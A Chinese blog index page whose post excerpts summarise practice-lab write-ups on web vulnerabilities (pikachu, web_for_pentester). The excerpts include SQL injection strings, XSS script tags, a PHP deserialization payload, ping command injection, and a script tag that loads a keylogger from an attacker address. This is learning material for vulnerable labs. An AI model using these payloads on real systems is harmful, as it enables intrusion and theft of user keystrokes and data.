会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
李时珍的皮ya
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
下一页
2020年9月25日
web_for_pentester_sql注入1-9
摘要: 数据库MySQL 靶机系统Debian 6 实验环境 web_pentester 手工注入 发现是 ’ 闭合 判断有几个回显 admin’ order by 5--+ 发现有5个回显 查看显示位置 0’ union select 1,2,3,4,5--+ 这里第一个数值不一定是0,只要是数据库不存在
阅读全文
posted @ 2020-09-25 18:48 漩溺
阅读(523)
评论(1)
推荐(0)
2020年4月22日
IIS的访问日志各字段介绍
摘要: windows日志文件一般在C:\WINDOWS\system32\LogFiles 也可以根据服务器的日志名称来查看 我这里截取了一段来说明一下 2020-04-22 08:43:01 W3SVC18 127.0.0.1 GET /onews.asp id=41%20and%201%20=%201
阅读全文
posted @ 2020-04-22 17:55 漩溺
阅读(316)
评论(0)
推荐(0)
2020年3月31日
pikachu-php反序列化/xee漏洞/url重定向/ssrf
摘要: php反序列化 序列化serialize()就是把一个对象变成可以传输的字符串,比如下面是一个对象: 反序列化unserialize()就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。 输入代码 O:1:"S":1:{s:4:"test";s:29:"<script>alert('a
阅读全文
posted @ 2020-03-31 15:03 漩溺
阅读(463)
评论(0)
推荐(0)
pikachu-越权/目录遍历/敏感信息泄露
摘要: 水平越权 A用户和B用户属于同一级别用户,但各自不能操作对方个人信息。A用户如果越权操作B用户个人信息的情况称为水行越权操作 对比发现url只有username不同,所以我们不用退出账号直接访问lucy看看,发现水平越权 垂直越权 A用户权限高于B用户,B用户越权操作A用户的权限的情况称为垂直越权,
阅读全文
posted @ 2020-03-31 14:58 漩溺
阅读(347)
评论(0)
推荐(0)
pikachu-文件下载/文件上传
摘要: filedownload 我们随便下载了一个文件之后发现url出现的信息与上面有点像 所以我们直接修改参数,下载其他的文件 client check 先上传一张真照片然后用bp抓取,在把filename的参数改成你想上传的东西 MIME type 与上一个的处理方法一样 getimagesize 这
阅读全文
posted @ 2020-03-31 14:52 漩溺
阅读(327)
评论(0)
推荐(0)
pikachu-rce,fileinclusion
摘要: RCE exec ping 输入ip地址 后面加上个ipconfig exec “eval” 这里面直接写命令不行,但是加上函数名称就可以了,输入phpinfo()就行 文件 文件local 所以运用切换目录的方法切换到其他的php文件 file (remote) 测试之前需要把这俩个参数改成On
阅读全文
posted @ 2020-03-31 14:47 漩溺
阅读(173)
评论(0)
推荐(0)
pikachu-sql注入
摘要: sql注入数字型post bp抓包后修改下提交的数据即可 字符型注入 输入 ' 1 = 1# 搜索型 既然提示输入用户名的一部分猜想,使用的是sql中的like来进行匹配,这样使用%闭合即可 xx型注入 输入单引号返回提示 所以闭合就是 '),接着遍历 insert/update注入 既然是插入语句
阅读全文
posted @ 2020-03-31 14:41 漩溺
阅读(188)
评论(0)
推荐(0)
pikachu-csrf
摘要: csrf csrf漏洞概念 csrf攻击满足的条件 1,网站没有对个人信息修改的请求进行防csrf处理,导致请求容易被伪造 2,用户在登录后台的情况下,点击了攻击者发送的链接,如果用户没登陆或没点链接都不会成功 csrf与xss的区别 如何确认一个web系统存在csrf漏洞 模仿用户从登录到信息修改
阅读全文
posted @ 2020-03-31 14:29 漩溺
阅读(261)
评论(0)
推荐(0)
pikachu-xss(2)
摘要: 获取键盘记录 同样, 攻击js脚本位于网站目录下的 pkxss/rkeypress/rk.js 这里是攻击者的地址 留言板输入恶意代码 <script src='http://192.168.21.10/pikachu-master/pkxss/rkeypress/rk.js'></script>
阅读全文
posted @ 2020-03-31 14:19 漩溺
阅读(205)
评论(0)
推荐(0)
2020年3月30日
pikachu-xss(1)
摘要: 反射性xss(get) 输入特殊字符,没有被过滤,内容没有被改变 改变长度的限制,输入简单的脚本语言 <script>alert('nice')<script> 这里是以get方式提交到后台,url的内容提交到后台 get和post典型区别: get是以url方式提交数据 post是以表单方式在请求
阅读全文
posted @ 2020-03-30 17:20 漩溺
阅读(292)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
下一页
公告